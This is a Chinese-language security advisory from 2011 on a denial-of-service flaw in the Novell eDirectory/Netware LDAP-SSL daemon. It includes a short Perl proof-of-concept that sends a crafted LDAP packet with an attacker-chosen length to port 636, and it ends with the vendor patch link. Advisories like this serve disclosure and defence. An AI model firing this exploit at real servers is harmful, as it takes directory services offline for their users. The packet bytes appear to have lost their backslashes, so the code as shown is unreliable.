发布日期:2011-05-16
更新日期:2011-05-16受影响系统:
Novell Netware
Novell eDirectory
描述:
--------------------------------------------------------------------------------
Novell eDirectory是一个的跨平台的目录服务器。Novell eDirectory/Netware LDAP-SSL后台程序在实现上存在拒绝服务漏洞,由于系统不恰当地分配用户指定的内存量,攻击者可利用此漏洞造成系统范围内的拒绝服务。<*来源:Henri Lindberg (henri.lindberg@louhi.fi)
链接:http://marc.info/?l=bugtraq&m=130556395605091&w=2
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl
# usage: ./novell.pl 10.0.0.1 0x41424344
use IO::Socket::SSL;
$socket = new IO::Socket::SSL(Proto=>"tcp",
PeerAddr=>$ARGV[0], PeerPort=>636);
die "unable to connect to $host:$port ($!)
" unless $socket;
print $socket "x30x84" . pack("N",hex($ARGV[1])) .
"x02x01x01x60x09x02x01x03x04x02x44x4ex80x00" ;
close $socket; print "done
";建议:
--------------------------------------------------------------------------------
厂商补丁:Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://support.novell.com/security-alertsLinux Kernel “icmp_send()”空指针引用远程拒绝服务漏洞Linux Kernel “IP GRE”模块空指针引用拒绝服务漏洞相关资讯 Novell Linux漏洞
- 敲击28次退格键之后:Linux漏洞可 (12/18/2015 11:22:28)
- Linux出现重大漏洞 GHOST ? (01/30/2015 18:35:07)
- Linux 2.6.31本地代码执行漏洞( (07/07/2014 07:51:17)
| - Red Hat Linux 修补“libuser”库 (07/26/2015 06:39:34)
- 红帽反驳:“Grinch(鬼精灵)”算 (12/30/2014 07:38:23)
- Linux gcc++漏洞:普通用户获得 (08/16/2013 11:57:41)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
-
|
易网时代-编程资源站